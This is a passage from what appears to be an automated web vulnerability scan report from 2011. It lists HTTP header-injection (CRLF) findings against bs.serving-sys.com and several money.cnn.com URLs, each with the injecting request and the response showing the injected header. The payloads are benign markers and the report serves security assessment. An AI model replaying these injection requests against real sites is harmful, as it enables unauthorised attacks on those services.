Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=76238e15-8c4d-4f61-824e-4e05fec4c7d73HX040; expires=Wed, 03-Aug-2011 08:43:34 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=10.2154&RES=83642
a73a02d7dd9&WMPV=0; expires=Wed, 03-Aug-2011 08: 43:34 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 05 May 2011 12:43:33 GMT
Connection: close
Content-Length: 0

4.7. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload aea5e%0d%0addd8221295a was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=5130026~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~261~0~01020^ebAboveTheFoldDuration~261~0~01020&OptOut=0&ebRandom=0.19715182739309967&flv=10.2154&wmpv=aea5e%0d%0addd8221295a&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/product/iPhone/aim/
Origin: http://mobile.aol.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=78d3cb7f-dae9-42bd-ae1b-0298e52a5d1b3HX050; expires=Wed, 03-Aug-2011 08:43:34 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=10.2154&RES=128&WMPV=aea5e
ddd8221295a; expires=Wed, 03-Aug-2011 08: 43:34 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 05 May 2011 12:43:33 GMT
Connection: close
Content-Length: 0

4.8. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/04/22/pf/airline_fees_rise/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload b97bc%0d%0ac8c08d61955 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /rssclick/b97bc%0d%0ac8c08d61955/04/22/pf/airline_fees_rise/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:36 GMT
Server: Apache
Location: http://money.cnn.com/b97bc
c8c08d61955/04/22/pf/airline_fees_rise/index.htm
Vary: Accept-Encoding
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/b97bc
c8c08d61955/04/22/p
...[SNIP]...

4.9. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/04/22/pf/airline_fees_rise/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 88309%0d%0ab79d19b4924 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/88309%0d%0ab79d19b4924/22/pf/airline_fees_rise/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:41 GMT
Server: Apache
Location: http://money.cnn.com/2011/88309
b79d19b4924/22/pf/airline_fees_rise/index.htm
Vary: Accept-Encoding
Content-Length: 325
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/88309
b79d19b4924/22
...[SNIP]...

4.10. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/04/22/pf/airline_fees_rise/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 78d87%0d%0a6fb9e0e3c55 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/04/78d87%0d%0a6fb9e0e3c55/pf/airline_fees_rise/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:43 GMT
Server: Apache
Location: http://money.cnn.com/2011/04/78d87
6fb9e0e3c55/pf/airline_fees_rise/index.htm
Vary: Accept-Encoding
Content-Length: 325
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/04/78d87
6fb9e0e3c55
...[SNIP]...

4.11. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/04/22/pf/airline_fees_rise/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 38578%0d%0adceb17e336b was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/04/22/38578%0d%0adceb17e336b/airline_fees_rise/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:44 GMT
Server: Apache
Location: http://money.cnn.com/2011/04/22/38578
dceb17e336b/airline_fees_rise/index.htm
Vary: Accept-Encoding
Content-Length: 325
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/04/22/38578
dceb17e3
...[SNIP]...

4.12. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/04/22/pf/airline_fees_rise/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload c974d%0d%0adfb8820098c was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/04/22/pf/c974d%0d%0adfb8820098c/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/04/22/pf/c974d
dfb8820098c/index.htm
Vary: Accept-Encoding
Content-Length: 310
Connection: close
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/04/22/pf/c974d
dfb88
...[SNIP]...

4.13. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/04/22/pf/airline_fees_rise/index.htm

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload 90cb7%0d%0a576c6e118c8 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/04/22/pf/airline_fees_rise/90cb7%0d%0a576c6e118c8 HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/04/22/pf/airline_fees_rise/90cb7
576c6e118c8
Vary: Accept-Encoding
Content-Length: 318
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/04/22/pf/airline_fees
...[SNIP]...

4.14. http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/02/pf/atm_fees_chase/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 8f75b%0d%0a0301f88c9c9 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /rssclick/8f75b%0d%0a0301f88c9c9/05/02/pf/atm_fees_chase/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:35 GMT
Server: Apache
Location: http://money.cnn.com/8f75b
0301f88c9c9/05/02/pf/atm_fees_chase/index.htm
Vary: Accept-Encoding
Content-Length: 320
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/8f75b
0301f88c9c9/05/02/p
...[SNIP]...

4.15. http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/02/pf/atm_fees_chase/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload a21ea%0d%0ace8f08eda0a was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/a21ea%0d%0ace8f08eda0a/02/pf/atm_fees_chase/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:39 GMT
Server: Apache
Location: http://money.cnn.com/2011/a21ea
ce8f08eda0a/02/pf/atm_fees_chase/index.htm
Vary: Accept-Encoding
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/a21ea
ce8f08eda0a/02
...[SNIP]...

4.16. http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/02/pf/atm_fees_chase/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 3c9cf%0d%0a319eab080e was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/3c9cf%0d%0a319eab080e/pf/atm_fees_chase/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:40 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/3c9cf
319eab080e/pf/atm_fees_chase/index.htm
Vary: Accept-Encoding
Content-Length: 321
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/3c9cf
319eab080e/
...[SNIP]...

4.17. http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/02/pf/atm_fees_chase/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 44f36%0d%0a03edaf98efe was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/02/44f36%0d%0a03edaf98efe/atm_fees_chase/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:41 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/02/44f36
03edaf98efe/atm_fees_chase/index.htm
Vary: Accept-Encoding
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/02/44f36
03edaf98
...[SNIP]...

4.18. http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/02/pf/atm_fees_chase/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload 40f4e%0d%0a01397931e17 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/02/pf/40f4e%0d%0a01397931e17/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:43 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/02/pf/40f4e
01397931e17/index.htm
Vary: Accept-Encoding
Content-Length: 310
Connection: close
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/02/pf/40f4e
01397
...[SNIP]...

4.19. http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/02/pf/atm_fees_chase/index.htm

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload a6e8c%0d%0a5795da73b5a was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/02/pf/atm_fees_chase/a6e8c%0d%0a5795da73b5a HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:44 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/02/pf/atm_fees_chase/a6e8c
5795da73b5a
Vary: Accept-Encoding
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/02/pf/atm_fees_cha
...[SNIP]...

4.20. http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 9d058%0d%0a1bf56faaac5 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /rssclick/9d058%0d%0a1bf56faaac5/05/02/real_estate/home-sale-strategies.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:42 GMT
Server: Apache
Location: http://money.cnn.com/9d058
1bf56faaac5/05/02/real_estate/home-sale-strategies.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 344
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/9d058
1bf56faaac5/05/02/r
...[SNIP]...

4.21. http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload ec1d9%0d%0a9b4a48b1ec3 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/ec1d9%0d%0a9b4a48b1ec3/02/real_estate/home-sale-strategies.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:43 GMT
Server: Apache
Location: http://money.cnn.com/2011/ec1d9
9b4a48b1ec3/02/real_estate/home-sale-strategies.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 346
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/ec1d9
9b4a48b1ec3/02
...[SNIP]...

4.22. http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 30187%0d%0ad728de29929 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/30187%0d%0ad728de29929/real_estate/home-sale-strategies.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:44 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/30187
d728de29929/real_estate/home-sale-strategies.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 346
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/30187
d728de29929
...[SNIP]...

4.23. http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload af131%0d%0a1082710a90d was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/02/af131%0d%0a1082710a90d/home-sale-strategies.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:44 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/02/af131
1082710a90d/home-sale-strategies.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 337
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/02/af131
1082710a
...[SNIP]...

4.24. http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload 7fe5b%0d%0af797b3b6d6e was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/02/real_estate/7fe5b%0d%0af797b3b6d6e/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/02/real_estate/7fe5b
f797b3b6d6e/index.htm
Vary: Accept-Encoding
Content-Length: 319
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/02/real_estate/7fe
...[SNIP]...

4.25. http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload 1e387%0d%0a1eb5ea7f25 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/1e387%0d%0a1eb5ea7f25 HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/02/real_estate/home-sale-strategies.moneymag/1e387
1eb5ea7f25
Vary: Accept-Encoding
Content-Length: 338
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/02/real_estate/hom
...[SNIP]...

4.26. http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload f99ed%0d%0a85c2e16168 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /rssclick/f99ed%0d%0a85c2e16168/05/03/pf/credit_card_fraud_identity_theft/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:42 GMT
Server: Apache
Location: http://money.cnn.com/f99ed
85c2e16168/05/03/pf/credit_card_fraud_identity_theft/index.htm
Vary: Accept-Encoding
Content-Length: 337
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/f99ed
85c2e16168/05/03/pf
...[SNIP]...

4.27. http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 3deb8%0d%0a85daf08f43d was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/3deb8%0d%0a85daf08f43d/03/pf/credit_card_fraud_identity_theft/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:44 GMT
Server: Apache
Location: http://money.cnn.com/2011/3deb8
85daf08f43d/03/pf/credit_card_fraud_identity_theft/index.htm
Vary: Accept-Encoding
Content-Length: 340
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/3deb8
85daf08f43d/03
...[SNIP]...

4.28. http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 4ed98%0d%0a4018d3b4574 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/4ed98%0d%0a4018d3b4574/pf/credit_card_fraud_identity_theft/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/4ed98
4018d3b4574/pf/credit_card_fraud_identity_theft/index.htm
Vary: Accept-Encoding
Content-Length: 340
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/4ed98
4018d3b4574
...[SNIP]...

4.29. http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload d15ab%0d%0a85e45e0a9d3 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/d15ab%0d%0a85e45e0a9d3/credit_card_fraud_identity_theft/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/d15ab
85e45e0a9d3/credit_card_fraud_identity_theft/index.htm
Vary: Accept-Encoding
Content-Length: 340
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/d15ab
85e45e0a
...[SNIP]...

4.30. http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 6] previous next

Summary

Severity:	High
